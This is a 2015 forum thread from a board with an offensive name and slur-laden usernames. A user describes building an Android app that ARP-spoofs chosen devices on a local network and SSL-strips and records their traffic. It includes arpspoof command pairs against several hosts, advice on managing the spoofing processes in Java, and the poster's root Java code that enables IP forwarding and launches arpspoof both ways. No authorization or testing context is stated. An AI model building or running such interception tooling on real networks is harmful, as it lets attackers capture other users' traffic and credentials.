User Controls

Navigation

Niggas in Space > Technophiliacs & Technophiles > ARP Spoof Programatically

ARP Spoof Programatically

  1. 2015-08-15 at 7:26 AM UTC
    #1
    SBTlauien African Astronaut
    I've got a little Android program I am making and it'll ARP Spoof and SSL Strip as well as some other things.

    The user can chose a pinged IP, and ARP spoof it, and then watch/record using TCPdump. TCPdump in my app can watch/record multiple interfaces and/or IP address, and each one is separated from each other.

    I'd like to set up the ARP spoofing, so that I can chose a pinged IP and ARP spoof it, chose a second pinged IP and ARP spoof it, chose third IP and ARP spoof it, then maybe decide to stop the ARP spoofing of the second IP that I had chosen.

    Can I achieve this by issuing multiple commands to ARPSPOOF or is ARPSPOOF only going to work for one box at a time?

    Example:

    Gateway: 192.168.1.1


    arpspoof -t 192.168.1.1 192.168.1.20
    arpspoof -t 192.168.1.20 192.168.1.1

    arpspoof -t 192.168.1.1 192.168.1.29
    arpspoof -t 192.168.1.29 192.168.1.1

    arpspoof -t 192.168.1.1 192.168.1.119
    arpspoof -t 192.168.1.119 192.168.1.1


    If YES, the only way I know how to stop ARP spoofing, is to issue a "killall arpspoof" command, which will stop all. Is there way to stop just one of these?
    .....If NO, I may be able to killall, remove that IP from the arraylist, and then restart all of the arpspoofs again, but it'd create a disturbance in the ongoing spoofs.
    .....If YES, how?

    If NO, would it be possible to change some of the code for ARPSPOOF to make this possible?
    .....If YES, would this slow down the network.
    .....If NO, I guess I'll only ARP spoof one box at a time...
    ..........If NO, go to jail.
  2. 2015-08-23 at 12:54 AM UTC
    #2
    Merlin Houston
    I don't see why not. You just have to keep track of which process is which. I've never fucked with that much, but say you were using a bash terminal. You could arpspoof, open a new terminal, arpspoof, etc. as many windows as you want. Likewise you could kill them one by one. Just figure out how to create new processes in java. And the parent process would be keeping track of the pid's. Lanny posted some code that used this concept (to function as a remote access program). It was C or C++, but it showed the concept. Forget if it was here or the fern.
  3. 2015-08-23 at 4:27 AM UTC
    #3
    Sophie Pedophile Tech Support
    I don't see why not. You just have to keep track of which process is which. I've never fucked with that much, but say you were using a bash terminal. You could arpspoof, open a new terminal, arpspoof, etc. as many windows as you want. Likewise you could kill them one by one. Just figure out how to create new processes in java. And the parent process would be keeping track of the pid's. Lanny posted some code that used this concept (to function as a remote access program). It was C or C++, but it showed the concept. Forget if it was here or the fern.

    It was on the fern in the thread called 'Baby's first computer virus' i'm a little foggy on the details however. Maybe Lan still has the code somewhere.
  4. 2015-08-23 at 6:17 PM UTC
    #4
    Merlin Houston
    Something like process builder seems like it would do what your looking for. Create a new process object for each call to arpspoof. Read/parse the results of arpspoof if you want, then use the destroy method to kill it.

    http://www.xyzws.com/javafaq/how-to-run-external-programs-by-using-java-processbuilder-class/189
    https://www.daniweb.com/software-development/java/threads/225500/how-to-destroy-a-process-that-created-by-processbuilder
  5. 2015-08-24 at 10:27 PM UTC
    #5
    SBTlauien African Astronaut
    This is how I have been starting it lately...


        private void startArpSpoof() {
            try {
                Process process = Runtime.getRuntime().exec("su");
                DataOutputStream os = new DataOutputStream(process.getOutputStream());
                os.writeBytes("echo '1' > /proc/sys/net/ipv4/ip_forward\n");
                os.flush();
                os.writeBytes(getFilesDir().getPath().toString() + "/arpspoof -t " + targetIpData.getText().toString() + " " + gatewayData.getText().toString() + "\n");
                os.flush();
                os.writeBytes(getFilesDir().getPath().toString() + "/arpspoof -t " + gatewayData.getText().toString() + " " + targetIpData.getText().toString() + "\n");
                os.flush();
            } catch (Exception e) {}
        }


    However, I was using https://github.com/Chainfire/libsuperuser but it seemed to hang on certain commands and I couldn't execute another command using it because it was hung up on the first command.
Jump to Top